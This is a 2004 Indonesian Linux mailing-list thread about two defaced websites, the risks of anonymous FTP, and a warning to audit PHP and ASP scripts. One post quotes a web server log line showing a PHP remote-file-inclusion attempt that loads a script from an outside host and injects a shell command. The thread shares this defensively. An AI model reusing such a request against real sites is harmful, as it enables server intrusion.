On Saturday 13 March 2004 16:14, Bloody Good wrote: > --- Rio Martin <[EMAIL PROTECTED]> wrote: > > On Saturday 13 March 2004 01:17, Bloody Good wrote: > > > On Fri, Mar 12, 2004 at 07:00:00PM +0700, > > lordsanjay > > > wrote: > > > sampang.net and www.lenkom.net.id di host di > > > apenta.com. Ini berdasarkan nameserver yg biasanya > > > cukup ok untuk identifikasi hoster nya. Dan > > dilihat > > > dari IP bloknya yg seblok juga apenta.com. > > > Mas2 di apenta.com, 2 pelanggan anda kena hack. > > Gue > > > nyaranin tutup juga tuh anonymous FTP nya kalo > > nggak > > > perlu. > > Jadi si intruder masuk lewat FTP yah? cukup hebat > > saya bilang kalau dia > > tembusnya dari FTP. Sebab FTP yang di Linux pake > > ProFTPD sedangkan di Windows > > pake bawaannya si IIS. > > Kalau masuknya lewat web gimana ? > ooops.. gue nggak bilang masuknya lewat ftp. ntar kena > flame dari proftpd users :) > Gue cuma bilang kalo anonymous ftp itu potensi > trouble. > Gue liat sendiri log file server gue byk banget yg > coba anonymous ftp padahal kitanya juga nggak pernah > advertise kalo ada anon ftp. Dari modelnya kitanya > kena scan, mungkin pake robot yg nyecan IP addresses > lalu nyoba anon ftp. > Kan juga nggak perlu ngasih anon ftp access kalo nggak > diperlukan. > Hackernya minim bisa upload index file sendiri. Upload > file mungkin aja lewat ftp, scp/sftp, applikasi PHP, > atau FrontPage extension. > Dan nggak tau kenapa begitu denger frontpage > extension, > bulu kuduk jadi berdiri ;)
Daripada penasaran semua, ini saya coba buka sedikit dari kejadian yang belum lama menyentuh server teman saya. Thanks untuk Whaone atas log nya Log dari HTTP: 202.155.70.242 - - [26/Feb/2004:04:53:21 +0700] "GET /main.php?cont=http://develbox.bhc.or.id/~pupet/pupet&cahyo=cd%20/var/tmp%20;%20cat%20cahyo.txt HTTP/1.0" 200 4552 Rupaya si IP 202.155.70.242 mencoba - coba keampuhan scriptnya, sayang sekali dia mencoba - coba ke destination yang salah dan sedikit agak ceroboh tidak mengcover IP nya. Mungkin saja ip warnet .. who knows .. Nah contohnya seperti itu diatas. Oh ya sengaja saya buka ini ke public, sebab saya capek nungguin tanggapan abuse nya Indosatnet, kagak respon. Berhati-hatilah rekan2 sekalian, periksa dan teliti script PHP , ASP pada website. Barangkali saja memang ada hole yang belum ditutup. Untuk yang melakukan dari ip 202.155.70.242, saya cuma titip pesan " Better Luck Next Time .. " (: - Rio.Martin - -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
